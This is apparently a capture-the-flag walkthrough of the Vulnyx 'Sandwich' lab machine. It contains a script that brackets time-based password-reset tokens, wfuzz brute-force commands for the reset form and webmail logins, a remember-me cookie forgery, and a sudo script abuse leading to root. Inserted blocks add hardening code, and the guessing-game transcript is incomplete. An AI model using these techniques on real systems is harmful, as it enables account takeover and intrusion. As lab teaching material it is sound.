Vulnyx-Sandwich-Walkthrough
城南花已开 Lv6

Information Gathering

Service Detection

sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.131 08:00:27:81:b7:98 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f0:6f:4b VMware, Inc.
^C
export ip=192.168.60.131
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.131:22
Open 192.168.60.131:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 22:18 CST
Initiating ARP Ping Scan at 22:18
Scanning 192.168.60.131 [1 port]
Completed ARP Ping Scan at 22:18, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:18
Completed Parallel DNS resolution of 1 host. at 22:18, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:18
Scanning 192.168.60.131 [2 ports]
Discovered open port 22/tcp on 192.168.60.131
Discovered open port 80/tcp on 192.168.60.131
Completed SYN Stealth Scan at 22:18, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.131
Host is up, received arp-response (0.00070s latency).
Scanned at 2025-03-31 22:18:08 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:81:B7:98 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Port 80 is open. Open it in the browser, then edit the hosts file to add the domain name.

echo "$ip sandwich.nyx"|sudo tee -a /etc/hosts
192.168.60.131 sandwich.nyx

Scan for directories.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.131
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 7845]
/download.php (Status: 200) [Size: 58]
/img (Status: 301) [Size: 314] [--> http://192.168.60.131/img/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/vendor (Status: 301) [Size: 317] [--> http://192.168.60.131/vendor/]
/config.php (Status: 200) [Size: 0]
/resetpassword.php (Status: 200) [Size: 361]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

After some trial and error we learn that a user named admin exists.

Subdomain Enumeration

Fuzz for subdomains.

This reveals webmail.sandwich.nyx.

Edit the hosts file again to add the domain.

❯ wfuzz -c -u "http://sandwich.nyx" -H "HOST:FUZZ.sandwich.nyx" -H "User-Agent:Mozilla/5.0" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://sandwich.nyx/
Total requests: 114441

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================


000000005: 302 0 L 0 W 0 Ch "webmail - webmail"

After visiting it, we can register an account.

Messages can be sent, but that is of no use.

At the same time, on sandwich.nyx we can register again using the mailbox created under the webmail subdomain.

Forged Token Collision

Next, use the forgot-password feature; the system automatically sends an email to the mailbox of the account we just registered.

We can also tell that the password reset feature uses a token to identify which user's password is being reset.

Looking closely at the token's pattern, only the leading two parts vary; the rest stays essentially fixed:

-11f0-8069-08002781b798

After repeated testing and grilling GPT, the conclusion is that the leading part most likely changes with a timestamp.

Since we can send reset requests not only for our known account but also for the admin account,

the idea is to construct admin's token from the timestamp at which admin's reset request was sent.

However, I did not succeed; the approach was too narrow. The timestamp is nanosecond-based, so it is practically impossible to construct an exactly identical, correct token.

Using the "squeeze theorem" idea suggested by He110word from the group chat 🤣, it was solved instantly, haha.

Concretely, three POST requests are sent to fuzz admin's token.

The first and the last send a reset request for the known user, and the middle one sends a reset request for admin. From the token values in the two known-user requests, enumerate every token that could have been generated in between, and brute-force admin's password reset token from that range.

Here is the exploit script.

Just change the known account's email.

import requests
import time

# Target URL
url = 'http://sandwich.nyx/index.php'

# Reset request data for the first (known) account
data1 = {
    'email': '[email protected]',
    'reset_action': '1'
}

# Reset request data for the admin account
data2 = {
    'email': '[email protected]',
    'reset_action': '1'
}

# PHPSESSID of the known account
cookies1 = {'PHPSESSID': 'v4pjv1gnnhcsb26pb5khej5uh8'}

# Forged PHPSESSID
cookies2 = {'PHPSESSID': 'aaaaaaaaaaaaaaaaaaaaaaaaaaaa'}

# Recorded timestamps (unit: nanoseconds)
timestamps_ns = []

# Data and cookies for each request
requests_data = [
    (data1, cookies1),  # first request (known user)
    (data2, cookies2),  # second request (admin)
    (data1, cookies1)   # third request (known user)
]

for i, (data, cookies) in enumerate(requests_data):
    start_time_ns = time.perf_counter_ns()  # time before sending (nanoseconds)
    response = requests.post(url, data=data, cookies=cookies)  # send the request
    end_time_ns = time.perf_counter_ns()  # time when the response arrived

    timestamps_ns.append(end_time_ns)  # store the timestamp
    response_text = response.text.strip()

    # Check whether the reset request succeeded
    success = "Password reset link has been sent to your email." in response_text
    status_message = "重置成功" if success else "重置失败"

    print(f"第 {i+1} 次请求:")
    print(f"  发送时间: {start_time_ns} 纳秒")
    print(f"  服务器响应时间: {end_time_ns} 纳秒")
    print(f"  响应状态码: {response.status_code}")
    print(f"  结果: {status_message}\n")

# Compute the time differences once all three requests are done
if len(timestamps_ns) == 3:
    delta_1_ns = timestamps_ns[1] - timestamps_ns[0]
    delta_2_ns = timestamps_ns[2] - timestamps_ns[1]
    print(f"第 1 次和第 2 次请求时间间隔: {delta_1_ns} 纳秒")
    print(f"第 2 次和第 3 次请求时间间隔: {delta_2_ns} 纳秒")

Let's run it.

❯ python3 1.py
第 1 次请求:
发送时间: 3520987923174 纳秒
服务器响应时间: 3521032465004 纳秒
响应状态码: 200
结果: 重置成功

第 2 次请求:
发送时间: 3521032547314 纳秒
服务器响应时间: 3521039455429 纳秒
响应状态码: 200
结果: 重置成功

第 3 次请求:
发送时间: 3521039517704 纳秒
服务器响应时间: 3521050711911 纳秒
响应状态码: 200
结果: 重置成功

第 1 次和第 2 次请求时间间隔: 6990425 纳秒
第 2 次和第 3 次请求时间间隔: 11256482 纳秒

Because the requests are sent so quickly, one of the tokens may be invalid.

That does not matter: we already have the timestamp interval in which admin's token was generated.

We can again use GPT to write a script that parses the time, which helps us see which token's request came first.

import uuid
import datetime

def parse_uuid_v1(uuid_str):
    """Parse a UUID v1 and extract its timestamp."""
    token = uuid.UUID(uuid_str)

    # The UUID v1 time field counts 100 ns ticks since 1582-10-15; shift it to the Unix epoch
    timestamp = (token.time - 0x01b21dd213814000) / 1e7  # convert to seconds

    # Convert to a readable time (UTC)
    datetime_parsed = datetime.datetime.utcfromtimestamp(timestamp)

    return datetime_parsed

# Parse a UUID entered by the user
uuid_str = input("请输入要解析的 UUID: ").strip()
decoded_time = parse_uuid_v1(uuid_str)

print(f"解析的 UTC 时间: {decoded_time}")

Run it.

❯ python3 c.py
请输入要解析的 UUID: a9b8c69e-12ca-11f0-8069-08002781b798
解析的 UTC 时间: 2025-04-06 09:36:48.863811
❯ python3 c.py
请输入要解析的 UUID: a9b619a8-12ca-11f0-8069-08002781b798
解析的 UTC 时间: 2025-04-06 09:36:48.846276

Have GPT generate a token dictionary.

def generate_all_uuids_between(uuid1, uuid2):
    # Parse the leading (time_low) part of each UUID
    uuid1_prefix = int(uuid1.split('-')[0], 16)
    uuid2_prefix = int(uuid2.split('-')[0], 16)
    dynamic_part = uuid1.split('-')[1]
    # Check that uuid1_prefix is not greater than uuid2_prefix
    if uuid1_prefix > uuid2_prefix:
        raise ValueError("The first UUID must be smaller than the second UUID")

    # Generate every possible prefix in the range
    uuids = {}
    for current_prefix in range(uuid1_prefix, uuid2_prefix + 1):
        # Format the current prefix as 8 zero-padded hex digits
        current_prefix_hex = f'{current_prefix:08x}'
        # Build the UUID for the current prefix
        current_uuid = f'{current_prefix_hex}-{dynamic_part}-11f0-8069-08002781b798'
        uuids[current_prefix] = current_uuid

    return uuids

# The two observed UUIDs
uuid1 = 'a9b619a8-12ca-11f0-8069-08002781b798'
uuid2 = 'a9b8c69e-12ca-11f0-8069-08002781b798'

# Generate and print every UUID between the two
uuids_dict = generate_all_uuids_between(uuid1, uuid2)
for prefix, candidate in uuids_dict.items():
    print(candidate)

Write the output to dic.txt.

❯ python3 2.py>dic.txt
head dic.txt
a9b619a8-12ca-11f0-8069-08002781b798
a9b619a9-12ca-11f0-8069-08002781b798
a9b619aa-12ca-11f0-8069-08002781b798
a9b619ab-12ca-11f0-8069-08002781b798
a9b619ac-12ca-11f0-8069-08002781b798
a9b619ad-12ca-11f0-8069-08002781b798
a9b619ae-12ca-11f0-8069-08002781b798
a9b619af-12ca-11f0-8069-08002781b798
a9b619b0-12ca-11f0-8069-08002781b798
a9b619b1-12ca-11f0-8069-08002781b798
wc -l dic.txt
175351 dic.txt
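As an added example that is not part of the original post or the target application, the following generalizes the two helper scripts above: it decodes the full 60-bit v1 time field rather than only the first 8 hex digits, counts how many tokens the same generator could have issued between the two bracketing known-user tokens (the size of dic.txt), and shows the token scheme that removes the weakness: a CSPRNG token with no time or host structure, compared in constant time. The two sample tokens are the ones from the walkthrough; the function names are my own.

```python
import hmac
import secrets
import uuid

# The two known-user tokens from the walkthrough that bracket admin's token.
TOKEN_BEFORE = "a9b619a8-12ca-11f0-8069-08002781b798"
TOKEN_AFTER = "a9b8c69e-12ca-11f0-8069-08002781b798"

# 100-ns ticks between the Gregorian epoch (1582-10-15) and the Unix epoch.
UUID_V1_EPOCH_OFFSET = 0x01B21DD213814000


def uuid1_unix_seconds(token: str) -> float:
    """Unix time encoded in a version-1 UUID, taken from the whole 60-bit time
    field (time_low, time_mid and time_hi together), so a time_mid rollover
    between two tokens is handled correctly."""
    u = uuid.UUID(token)
    if u.version != 1:
        raise ValueError("not a version-1 UUID: there is no timestamp to decode")
    return (u.time - UUID_V1_EPOCH_OFFSET) / 1e7


def candidate_space(token_before: str, token_after: str) -> int:
    """Number of distinct v1 UUIDs one generator could have issued between two
    observed tokens: one per 100-ns tick, both endpoints included. This is the
    size of the search space a bracketing attacker has to cover."""
    a, b = uuid.UUID(token_before), uuid.UUID(token_after)
    if (a.node, a.clock_seq) != (b.node, b.clock_seq):
        raise ValueError("different node or clock_seq: not one contiguous clock")
    if b.time < a.time:
        a, b = b, a
    return b.time - a.time + 1


def issue_reset_token() -> str:
    """Hardened replacement: 256 bits from the OS CSPRNG. Neighbouring tokens
    reveal nothing about another user's token, so bracketing does not apply."""
    return secrets.token_urlsafe(32)


def verify_reset_token(stored: str, presented: str) -> bool:
    """Constant-time comparison so response timing does not leak a prefix match."""
    return hmac.compare_digest(stored.encode(), presented.encode())


if __name__ == "__main__":
    print(f"window: {candidate_space(TOKEN_BEFORE, TOKEN_AFTER)} candidate tokens")
    print(f"later token issued at Unix time {uuid1_unix_seconds(TOKEN_AFTER):.6f}")
```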

The dictionary is fairly large, but wfuzz gets through it quickly.

We reset admin's password to abc.

❯ wfuzz -c -u "http://sandwich.nyx/resetpassword.php" -d "token=FUZZ&new_password=abc&confirm_password=abc" -H "User-Agent:Mozilla/5.0" -w dic.txt --hw 36
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://sandwich.nyx/resetpassword.php
Total requests: 175351

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000105281: 200 15 L 41 W 408 Ch "a9b7b4e8-12ca-11f0-8069-08002781b798"
000175351: 200 15 L 41 W 408 Ch "a9b8c69e-12ca-11f0-8069-08002781b798"

Total time: 281.8470
Processed Requests: 175351
Filtered Requests: 175349
Requests/sec.: 622.1493

Log in with this password.

Here He110word offered an alternative based on a bug: tick "remember me" when logging in.

Then capture the request; the Cookie contains the username.

Delete the leading PHPSESSID, change the value after remember_meemail= to [email protected], and forward the request.

This also logs in as the admin user.

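Added example, not the target site's code: the cookie handling that the remember-me bypass above implies (the server believes whatever email the cookie carries) next to a signed, expiring remember-me cookie that rejects the same edit. The function names, the server key and the sample addresses are constructed for the example; the cookie name remember_meemail is the one seen in the walkthrough.

```python
import hashlib
import hmac
import secrets
import time

# Constructed server-side key for the example; a real deployment loads it from secret storage.
SERVER_KEY = secrets.token_bytes(32)


def user_from_cookie_insecure(cookie_header: str) -> str:
    """The pattern the bypass relies on: whatever email the remember_meemail cookie
    carries is treated as the logged-in user, with nothing to verify it."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "remember_meemail":
            return value
    return ""


def issue_remember_cookie(email: str, key: bytes, ttl_seconds: int = 7 * 86400, now=None) -> str:
    """Hardened form: 'email|expiry|tag', with tag = HMAC-SHA256 over email and expiry
    under a server-only key, so the client cannot change the email without breaking the tag."""
    expiry = int(now if now is not None else time.time()) + ttl_seconds
    payload = f"{email}|{expiry}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def user_from_cookie_signed(cookie: str, key: bytes, now=None) -> str:
    """Return the email only if the tag verifies and the cookie is unexpired, else ''."""
    parts = cookie.split("|")
    if len(parts) != 3 or not parts[1].isdigit():
        return ""
    email, expiry, tag = parts
    expected = hmac.new(key, f"{email}|{expiry}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):  # constant-time compare
        return ""
    current = now if now is not None else time.time()
    if current >= int(expiry):
        return ""
    return email


if __name__ == "__main__":
    # Constructed sample: a captured cookie header, then the same edit the bypass makes.
    captured = "PHPSESSID=v4pjv1gnnhcsb26pb5khej5uh8; remember_meemail=alice@example.test"
    print(user_from_cookie_insecure(captured.replace("alice", "admin")))  # accepted as admin
    good = issue_remember_cookie("alice@example.test", SERVER_KEY)
    print(repr(user_from_cookie_signed(good.replace("alice", "admin"), SERVER_KEY)))  # ''
```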


We obtain a CSV file containing the email names of five users.

After a little text processing,

we try to brute-force the webmail service with these users.

cat user.txt
ll104567_9q
suraxddq_tw
xerosec_w5
j4ckie_x5
matthygd_x

This may take a while; just wait. In my case the correct user was at the very bottom, so it ran all the way through.

Only the 302 redirect matters.

We obtain the credentials matthygd_x:qweasd.

❯ wfuzz -c -u "http://webmail.sandwich.nyx/login.php" -d "email=FUZZ%40sandwich.nyx&password=FUZ2Z" -H "User-Agent:Mozilla/5.0" -w user.txt -w 5000.txt --hw 59
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://webmail.sandwich.nyx/login.php
Total requests: 25000

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000004752: 200 30 L 58 W 849 Ch "ll104567_9q"
000009752: 200 30 L 58 W 849 Ch "suraxddq_tw"
000014752: 200 30 L 58 W 849 Ch "xerosec_w5"
000019752: 200 30 L 58 W 849 Ch "j4ckie_x5"
000022901: 302 0 L 0 W 0 Ch "matthygd_x - qweasd"
000024752: 200 30 L 58 W 849 Ch "matthygd_x"

Total time: 1461.657
Processed Requests: 25000
Filtered Requests: 24994
Requests/sec.: 17.10387

User Privilege Escalation

From the mailbox we obtain the SSH credentials:

matthygd_xy:tGCD9XIP03IHpSCDdoRu

Try connecting.

❯ ssh matthygd_xy@$ip
The authenticity of host '192.168.60.131 (192.168.60.131)' can't be established.
ED25519 key fingerprint is SHA256:c8erXE4AHVkShqJ2nmaoh+8C3ZBq0gRr5iBxLnGVt9k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.131' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux sandwich 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 30 19:35:02 2025 from 192.168.1.181
matthygd_xy@sandwich:~$ cat user.txt
c158efefab9bfd356fa8e9ec3c440da1

chvt: Switching Terminals

The user has sudo rights to run chvt.

matthygd_xy@sandwich:~$ sudo -l
Matching Defaults entries for matthygd_xy on sandwich:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User matthygd_xy may run the following commands on sandwich:
(root) NOPASSWD: /bin/chvt

In a Linux system, virtual consoles (VTs) are a mechanism that lets multiple users or tasks access the system at the same time. Each VT is an independent terminal session in which different commands and programs can run.

On a typical Linux desktop, the shortcut keys for switching virtual terminals are:

  • Ctrl + Alt + F1 through Ctrl + Alt + F12: switch to /dev/tty1 through /dev/tty12
    • For example, Ctrl + Alt + F2 → switch to /dev/tty2
  • Ctrl + Alt + F7 or F1 (depending on the distribution): usually returns to the graphical session (X or Wayland)

The chvt command lets a user switch directly from one VT to another without using the shortcut keys.

In short, it switches ttys.

There is also another user on the machine, ll104567.

matthygd_xy@sandwich:~$ ls -al /home/
total 16
drwxr-xr-x 4 root root 4096 mar 23 23:40 .
drwxr-xr-x 18 root root 4096 mar 22 23:05 ..
drwx------ 3 ll104567 ll104567 4096 mar 30 20:04 ll104567
drwx------ 2 matthygd_xy matthygd_xy 4096 mar 30 20:05 matthygd_xy

We use find to list the files owned by the user ll104567.

tty20 turns out to belong to this user.

matthygd_xy@sandwich:~$ find / -user  ll104567 2>/dev/null |grep -Pv 'proc|sys'
/run/user/1001
/dev/tty20
/home/ll104567

Try switching with chvt.

Although the switch happens, the user is still the same.

matthygd_xy@sandwich:~$ sudo /bin/chvt 20
matthygd_xy@sandwich:~$ id
uid=1000(matthygd_xy) gid=1000(matthygd_xy) grupos=1000(matthygd_xy),100(users)

It really has switched to tty20 now.

You have to go back to the virtual machine console.

This is equivalent to pressing Ctrl + Alt + F20, except that no shortcut key can perform this switch.

From the VM console, send a reverse shell back to Kali.

Root Privilege Escalation

Listen on a port.

We find that sudo allows running the /opt/game.sh script.

❯ pwncat-cs -lp 4444
[18:49:05] Welcome to pwncat 🐈! __main__.py:164
[18:49:06] received connection from 192.168.60.131:45340 bind.py:84
[18:49:06] 0.0.0.0:4444: normalizing shell path manager.py:957
[18:49:07] 192.168.60.131:45340: registered new host w/ db manager.py:957
(local) pwncat$

(remote) ll104567@sandwich:/home/ll104567$ sudo -l
Matching Defaults entries for ll104567 on sandwich:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty

User ll104567 may run the following commands on sandwich:
(ALL) NOPASSWD: /opt/game.sh

Let's look carefully at the script's contents.

(remote) ll104567@sandwich:/home/ll104567$ cat /opt/game.sh
#!/bin/bash

export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

MAX=2000000

ATTEMPTS=$(/usr/bin/awk -v max="$MAX" 'BEGIN {printf "%d", (log(max)/log(2) + 0.999999)}')

/bin/echo "Hello! What is your name?"
read NAME

NUMBER=$(( ( RANDOM % MAX ) + 1 ))

/bin/echo "Well, $NAME, I'm thinking of a number between 1 and $MAX."
/bin/echo "You have $ATTEMPTS attempts to guess it."

ATTEMPTS_MADE=0

SECRET_FILE="/root/.ssh/id_rsa"

while [ $ATTEMPTS_MADE -lt $ATTEMPTS ]; do
    /bin/echo "Try to guess:"
    read GUESS

    # Validate that the input is a valid number
    if ! [[ "$GUESS" =~ ^[0-9]+$ ]]; then
        /bin/echo "Please, enter a valid number."
        continue
    fi

    ATTEMPTS_MADE=$((ATTEMPTS_MADE + 1))

    if [ $GUESS -lt $NUMBER ]; then
        /bin/echo "Your guess is too low."
    elif [ $GUESS -gt $NUMBER ]; then
        /bin/echo "Your guess is too high."
    else
        break
    fi
done

if [ $GUESS -eq $NUMBER ]; then
    /bin/echo "Good job, $NAME! You guessed my number in $ATTEMPTS_MADE attempts!"
    /bin/echo "Here's your reward:"
    /bin/cat "$SECRET_FILE"
else
    /bin/echo "No, the number I was thinking of was $NUMBER."
fi

It is actually a small number guessing game.

You have 21 guesses in total.

It is straightforward: use binary search. Each guess halves the remaining range, so the budget is always enough.
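Added example (my code, not the machine's script) showing why the 21-attempt budget is no protection at all: it simulates the game's "too low"/"too high" replies, plays bisection against them, and compares the worst case with the attempt budget computed the same way as the awk line in game.sh. It also records two caveats a reviewer would raise: the awk rounding comes out one short when MAX is an exact power of two, and bash's $RANDOM is 15-bit, so the secret never exceeds 32768 regardless of MAX. Function names are my own.

```python
import math

MAX = 2_000_000  # MAX from game.sh
# bash's $RANDOM is 0..32767, so "RANDOM % MAX + 1" actually lands in 1..32768.
EFFECTIVE_MAX = 32768


def attempts_allowed(max_value: int) -> int:
    """The attempt budget exactly as game.sh's awk computes it: printf "%d" truncates,
    so the +0.999999 rounds log2(max) up unless max is an exact power of two."""
    return int(math.log(max_value) / math.log(2) + 0.999999)


def worst_case_bisection(max_value: int) -> int:
    """Guesses bisection needs in the worst case on 1..max_value: floor(log2 n) + 1."""
    return max_value.bit_length()


def make_oracle(secret: int):
    """Stand-in for the script's replies: -1 for 'too low', +1 for 'too high', 0 for a hit."""
    def oracle(guess: int) -> int:
        return (guess > secret) - (guess < secret)
    return oracle


def bisect_guess(oracle, max_value: int = MAX):
    """Guess the midpoint and halve the interval on every reply.
    Returns (number, guesses_used)."""
    lo, hi, used = 1, max_value, 0
    while lo <= hi:
        mid = (lo + hi) // 2
        used += 1
        verdict = oracle(mid)
        if verdict == 0:
            return mid, used
        if verdict < 0:      # too low: the secret is above mid
            lo = mid + 1
        else:                # too high: the secret is below mid
            hi = mid - 1
    raise RuntimeError("replies are inconsistent with any fixed secret")


def max_guesses_over_range(max_value: int) -> int:
    """Play every possible secret in 1..max_value and report the most guesses needed."""
    return max(bisect_guess(make_oracle(s), max_value)[1] for s in range(1, max_value + 1))


if __name__ == "__main__":
    number, used = bisect_guess(make_oracle(8291))
    print(f"found {number} in {used} guesses; budget {attempts_allowed(MAX)}, "
          f"worst case {worst_case_bisection(MAX)}, "
          f"worst case on the real 1..{EFFECTIVE_MAX} range {worst_case_bisection(EFFECTIVE_MAX)}")
```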

(remote) ll104567@sandwich:/home/ll104567$ sudo /opt/game.sh
Hello! What is your name?
aaa
Well, aaa, I'm thinking of a number between 1 and 2000000.
You have 21 attempts to guess it.
Try to guess:
Your guess is too high.
Try to guess:
8280
Your guess is too low.
Try to guess:
8295
Your guess is too high.
Try to guess:
8287
Your guess is too low.
Try to guess:
8290
Your guess is too low.
Try to guess:
8292
Your guess is too high.
Try to guess:
8291
Good job, aaa! You guessed my number in 21 attempts!
Here's your reward:
-----BEGIN OPENSSH PRIVATE KEY-----
[private key material omitted]
-----END OPENSSH PRIVATE KEY-----

Try connecting.

(remote) ll104567@sandwich:/home/ll104567$ vi id_rsa
(remote) ll104567@sandwich:/home/ll104567$ chmod 600 id_rsa
(remote) ll104567@sandwich:/home/ll104567$ ssh [email protected] -i id_rsa
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:c8erXE4AHVkShqJ2nmaoh+8C3ZBq0gRr5iBxLnGVt9k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts.
Linux sandwich 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 30 20:14:35 2025 from 192.168.1.181
root@sandwich:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@sandwich:~# cat root.txt
a4e728e6ffc502beea7570a75348af44